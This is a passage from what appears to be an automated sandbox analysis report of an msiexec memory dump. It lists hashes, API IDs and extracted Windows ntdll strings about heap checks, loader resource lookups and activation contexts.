                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Item:$ Language:$ Name:$SR - $Type:
                                            • API String ID: 0-3082644519
                                            • Opcode ID: d54801fb2054a95be5b4cddec8f4b0e8af7f384daaf2774ded4d783b9ac31aac
                                            • Instruction ID: 46b931422b17d32ed505ec6c67819db1e100091077d078a8f0a2554778a615e6
                                            • Opcode Fuzzy Hash: d54801fb2054a95be5b4cddec8f4b0e8af7f384daaf2774ded4d783b9ac31aac
                                            • Instruction Fuzzy Hash: 05417472A002285BCF60CBA5CC48BEAB7BCAF46314F4441D5E449A7290DE34AE85CFA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %ld leaks detected.$HEAP: $HEAP[%wZ]: $Inspecting leaks at process shutdown ...$No leaks detected.
                                            • API String ID: 0-1155200129
                                            • Opcode ID: 048754360ebd527d6663d6eb65db6f81733a23c5b1a26a27536f747c55c3e5a5
                                            • Instruction ID: 51526c8ea3d021c52b65aa89d23959ce9adbe1334930604d9a649ca543052498
                                            • Opcode Fuzzy Hash: 048754360ebd527d6663d6eb65db6f81733a23c5b1a26a27536f747c55c3e5a5
                                            • Instruction Fuzzy Hash: D6311879615781CFC292BF24D988F3533F4EB42628F15855AE8008F291DA36A891CF60
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                            • API String ID: 0-1222099010
                                            • Opcode ID: 27cb37bb939bec844f51f4a66cec013f61eedd30460ccbed47c866a02a193deb
                                            • Instruction ID: 9a57b5ac3a6f64ff2e4f9602834b1c909cd9e11d56fd37401e9872e5a5551a6d
                                            • Opcode Fuzzy Hash: 27cb37bb939bec844f51f4a66cec013f61eedd30460ccbed47c866a02a193deb
                                            • Instruction Fuzzy Hash: 3D313B395187C4DFD3A2DB24C858BB97BF4EF01724F044195E8568B692CBB9B882CB61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$.mui$.mun$SystemResources\
                                            • API String ID: 0-3047833772
                                            • Opcode ID: 5d44281f34714c0bd0e5ea8026f43f3e4fd273ee37b2642f63dbf8cf5525bb5e
                                            • Instruction ID: 71db37b0a572e93839c8865d5af143e049b40558901e33093c750d9d2b00024c
                                            • Opcode Fuzzy Hash: 5d44281f34714c0bd0e5ea8026f43f3e4fd273ee37b2642f63dbf8cf5525bb5e
                                            • Instruction Fuzzy Hash: 61625076A047698FCB61CF54DC40BE9B7B8BF0A314F0041E5D449AB650EB31AE85CF52
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 645f534471bfed7b90b85b4d532eb7a7e5918fac66c3b09b0e3dfb3b973d3fe0
                                            • Instruction ID: 484ba05e4aaa3d21a83407e53b642ad7c13c1617b9cac831bae28453f1a58747
                                            • Opcode Fuzzy Hash: 645f534471bfed7b90b85b4d532eb7a7e5918fac66c3b09b0e3dfb3b973d3fe0
                                            • Instruction Fuzzy Hash: 5FE28F74A003558FDB55CF68C890BB9BBF1FF4A308F548199E849AB386D735B845CBA0
                                            Strings
                                            • HEAP[%wZ]: , xrefs: 1FD754D1, 1FD75592
                                            • HEAP: , xrefs: 1FD754E0, 1FD755A1
                                            • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 1FD754ED
                                            • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 1FD755AE
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                            • API String ID: 0-1657114761
                                            • Opcode ID: 8facc063634136db2522592ec3bd8fe1cc1106f1e48cc6672ab1f1ef46ebf453
                                            • Instruction ID: de965dd79744ccb8a4d86f72532940b27af9f3db62bebbefe2ca25cd6cbf7c83
                                            • Opcode Fuzzy Hash: 8facc063634136db2522592ec3bd8fe1cc1106f1e48cc6672ab1f1ef46ebf453
                                            • Instruction Fuzzy Hash: 0AA1F474A053469FD754CF28C884BBABBE2EF44308F948669D4998B681EB35F844C7E1
                                            Strings
                                            • RtlDeactivateActivationContext, xrefs: 1FD83425, 1FD83432, 1FD83451
                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 1FD83456
                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 1FD8342A
                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 1FD83437
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                            • API String ID: 0-1245972979
                                            • Opcode ID: 34f45ce1d721c38cab2a2ee969c742b4c71df83ae3eaf3a47ea76e336a61f078
                                            • Instruction ID: ae5f89456f4aaa0c50347b09e5b6b3575ba8fba2507d98c92ea23a78ba271505
                                            • Opcode Fuzzy Hash: 34f45ce1d721c38cab2a2ee969c742b4c71df83ae3eaf3a47ea76e336a61f078
                                            • Instruction Fuzzy Hash: 2D6134766007129FC792CF18C841B7AB3A5EF81B60F258519EC99DFA90DB34F841CBA1
                                            Strings
                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1FD8362F
                                            • minkernel\ntdll\ldrsnap.c, xrefs: 1FD83640, 1FD8366C
                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 1FD8365C
                                            • LdrpFindDllActivationContext, xrefs: 1FD83636, 1FD83662
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                            • API String ID: 0-3779518884
                                            • Opcode ID: 51227fa8818893c39b61a7938a4d2bda2e58e35a87c8e46a29caf9d84a46ff84
                                            • Instruction ID: 3568aede410bca3674e416432407097e6b6560bb758ac05212019ab76491e5b7
                                            • Opcode Fuzzy Hash: 51227fa8818893c39b61a7938a4d2bda2e58e35a87c8e46a29caf9d84a46ff84
                                            • Instruction Fuzzy Hash: AC311C36A00752AFDB91AB14CC88BB672A4BB03754F264166DC4457961EBB1BCC08795
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $May not destroy the process heap at %p$RtlDestroyHeap
                                            • API String ID: 0-4256168463
                                            • Opcode ID: 594fbcec27815cbae61a75862eaed4af06f5c158bb53486f64aedaf0e9942785
                                            • Instruction ID: 55831f7165b382c6895b78ddf983ee67c0af381e8df2e56ed3a1479a318329aa
                                            • Opcode Fuzzy Hash: 594fbcec27815cbae61a75862eaed4af06f5c158bb53486f64aedaf0e9942785
                                            • Instruction Fuzzy Hash: AA01C036111700DFCB91AFA4D800FEA73E9EF43650F044499E442DB281EA35F986CAA4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: af03c475e14cb586e88455a46dfbc0a1d0bf328887e7614ef73d18820e79e8b0
                                            • Instruction ID: 3303c3e0feae4beaed35604adeac69e5ac28f707a0aee6780ba76574fc1e0abb
                                            • Opcode Fuzzy Hash: af03c475e14cb586e88455a46dfbc0a1d0bf328887e7614ef73d18820e79e8b0
                                            • Instruction Fuzzy Hash: 8922D1746047829FE741CF24C491BBABBF5EF45708F548659E885CF282EB36E841CBA1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpResSearchResourceHandle Enter$LdrpResSearchResourceHandle Exit$PE
                                            • API String ID: 0-1168191160
                                            • Opcode ID: 533d03a15e4ea7f6b763105a75df69be5c44f54b596bce53c79a0c162a940281
                                            • Instruction ID: 6f0a1127f1831205c5f228cf77d2e853cd3aa7a4cab4de3127d324aa1374562d
                                            • Opcode Fuzzy Hash: 533d03a15e4ea7f6b763105a75df69be5c44f54b596bce53c79a0c162a940281
                                            • Instruction Fuzzy Hash: 12F183B5A003298BCBA0CF54CC80BE9B3B6AF44704F4541D9D549A7241EB77AE81CF5D
                                            Strings
                                            • LdrpLoadResourceFromAlternativeModule, xrefs: 1FD73AAF
                                            • {, xrefs: 1FD73ABD
                                            • 'LDR: %s(), invalid image format of MUI file , xrefs: 1FD73AB4
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                            • API String ID: 0-1697150599
                                            • Opcode ID: 2c348cc5e75e02f99609fa0fe3bd1c620c75270348d76e77b91ae0a963ba3427
                                            • Instruction ID: fd502d2be1817a8d1ee231c840fd9ad686ee075528e69ed5e2d1c7e192522cb0
                                            • Opcode Fuzzy Hash: 2c348cc5e75e02f99609fa0fe3bd1c620c75270348d76e77b91ae0a963ba3427
                                            • Instruction Fuzzy Hash: D6E17A7460C3868BD794CF24E590B7BB7E1AF84744F094A2DF8858F290EB71E945CB92
                                            Strings
                                            • Failed to allocated memory for shimmed module list, xrefs: 1FD7A10F
                                            • minkernel\ntdll\ldrinit.c, xrefs: 1FD7A121
                                            • LdrpCheckModule, xrefs: 1FD7A117
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-161242083
                                            • Opcode ID: 1db0920dbcccf84d92dd34b6fa68499f0177993ed930be9190f7f240dcab6083
                                            • Instruction ID: e060ba55fc231fba0fbfa1edd35e331e7fcc1e8b71c3af830e75a2183ee25627
                                            • Opcode Fuzzy Hash: 1db0920dbcccf84d92dd34b6fa68499f0177993ed930be9190f7f240dcab6083
                                            • Instruction Fuzzy Hash: 3F71CFB5E003069FDB44DFA8C988ABEB7F4EF84318F144529D906AB250E636BD41CB61
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-1334570610
                                            • Opcode ID: 45a7d912f54cd14641eba47faee64e17db868a1dc885adf77781a952c5c3d106
                                            • Instruction ID: 4de958314243d56f64dbf3eef485097547dc3f4d4e3f6eef1c6fe5e74168ff5f
                                            • Opcode Fuzzy Hash: 45a7d912f54cd14641eba47faee64e17db868a1dc885adf77781a952c5c3d106
                                            • Instruction Fuzzy Hash: 9E61C075614341DFD798DF24C484BBABBE2FF45308F94865AE4898F292D770E881CBA1
                                            Strings
                                            • InstallLanguageFallback, xrefs: 1FD0CD7F
                                            • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 1FD0CD34
                                            • @, xrefs: 1FD0CD63
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                            • API String ID: 0-1757540487
                                            • Opcode ID: 1b4332e0c8b086652e8883b29c6c5762a68621a1c2aa1885edb77ad3967c7bec
                                            • Instruction ID: 69dcc4783d475d54c6cae7c2d087f7aba1c33bebb2df3debe35b6c0a24f6e182
                                            • Opcode Fuzzy Hash: 1b4332e0c8b086652e8883b29c6c5762a68621a1c2aa1885edb77ad3967c7bec
                                            • Instruction Fuzzy Hash: 0551C1BA5043469BC740DF65C854BBBB7E8AF88764F41092EF9C9D7250E734F90487A2
                                            Strings
                                            • HEAP[%wZ]: , xrefs: 1FDBDC12
                                            • HEAP: , xrefs: 1FDBDC1F
                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 1FDBDC32
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                            • API String ID: 0-3815128232
                                            • Opcode ID: 8fb437b1f08c7c8e05d9f869171d52936d42c564fa4973fade1afec4227c0a4a
                                            • Instruction ID: bd742c9d549860cb9450d3b5323f95a9dcad4303c3ef720feb04c26a740790b0
                                            • Opcode Fuzzy Hash: 8fb437b1f08c7c8e05d9f869171d52936d42c564fa4973fade1afec4227c0a4a
                                            • Instruction Fuzzy Hash: 3A5103391042508BE3E4DE2AC8A47B277F1EF4B344F10485EE4D38B685E636E843DB26
                                            Strings
                                            • HEAP[%wZ]: , xrefs: 1FD6FB4B
                                            • HEAP: , xrefs: 1FD6FB58
                                            • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 1FD6FB63
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                            • API String ID: 0-1596344177
                                            • Opcode ID: 3b7eae154fa82d76cdc0adb2620166bde2e18c751c441ee1972a649b81d292e7
                                            • Instruction ID: f0306574a99a84a2cf7efbd6ce6c7bf2e97a77d086610a9fc64cc60e480bd8dd
                                            • Opcode Fuzzy Hash: 3b7eae154fa82d76cdc0adb2620166bde2e18c751c441ee1972a649b81d292e7
                                            • Instruction Fuzzy Hash: 3351DE34A08255DFCB54CF68D580ABABBB9FF4A314F158198D8549F282E731FD42CBA0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-2558761708
                                            • Opcode ID: 5d56d46433a84d0934e10e9b7af5dd50fe8e7c8c1130aae199da6de19d2e2152
                                            • Instruction ID: 59899d27945fc515cc479207cd6a189881080888ee769795a30ad07f8d664cc9
                                            • Opcode Fuzzy Hash: 5d56d46433a84d0934e10e9b7af5dd50fe8e7c8c1130aae199da6de19d2e2152
                                            • Instruction Fuzzy Hash: 4D11E4353142819FD798CB25C848B7AB3A6EF8171DF948259E44ACF290DB34F840C7A2
                                            APIs
                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 1FD9CFBD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID: CallFilterFunc@8
                                            • String ID: @
                                            • API String ID: 4062629308-2766056989
                                            • Opcode ID: b5cfd18868802487d10f0ddf96c41b4e7f4a96eb959478dd31d35c3551d6fdc0
                                            • Instruction ID: 30e2d6e8921bf21a0847a3cbb46501ae557f114a0f99dae542f9cb12c7d607ff
                                            • Opcode Fuzzy Hash: b5cfd18868802487d10f0ddf96c41b4e7f4a96eb959478dd31d35c3551d6fdc0
                                            • Instruction Fuzzy Hash: 89419C75A00229DFCB619FE5C840ABEBBF8FF45714F10412AE945DB2A4E735E801DBA0
                                            Strings
                                            • LdrResSearchResource Exit, xrefs: 1FD1AA25
                                            • LdrResSearchResource Enter, xrefs: 1FD1AA13
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                            • API String ID: 0-4066393604
                                            • Opcode ID: 5177a8a5bddea20ca5b50a5b06048054d3ae191f8f1832caa9ee1c4be2577790
                                            • Instruction ID: 25ff36ac340c11234d78c1b3b00e630dddf924cc3451fcd35b29019c20caa80c
                                            • Opcode Fuzzy Hash: 5177a8a5bddea20ca5b50a5b06048054d3ae191f8f1832caa9ee1c4be2577790
                                            • Instruction Fuzzy Hash: F5E18275E043999FDB91CEA5EA40BFEB7B9AF44314F110226E901EF290EB34A941CB51
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$TargetPath
                                            • API String ID: 0-4164548946
                                            • Opcode ID: 5fc1cff2c630f09a28f321ae5a4a7e69bdaeb1f994c84eb5ca7b8ea122d36698
                                            • Instruction ID: 9e45e51cab20ee6ebd85b96e226ebd689e98fac70a4cc9d4a52d446dd196621a
                                            • Opcode Fuzzy Hash: 5fc1cff2c630f09a28f321ae5a4a7e69bdaeb1f994c84eb5ca7b8ea122d36698
                                            • Instruction Fuzzy Hash: FB8100769043469FDB91CF24C884BBBB7A4BF84714F414A2DF8899B620E731EC05CB92
                                            Strings
                                            • LdrpResGetMappingSize Enter, xrefs: 1FD1AC6A
                                            • LdrpResGetMappingSize Exit, xrefs: 1FD1AC7C
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.2098966871.000000001FCE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 1FCE0000, based on PE: true
                                            • Associated: 00000008.00000002.2098966871.000000001FE09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000008.00000002.2098966871.000000001FE7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_1fce0000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpResGetMappingSize Enter$LdrpResGetMappingSize Exit
                                            • API String ID: 0-1497657909
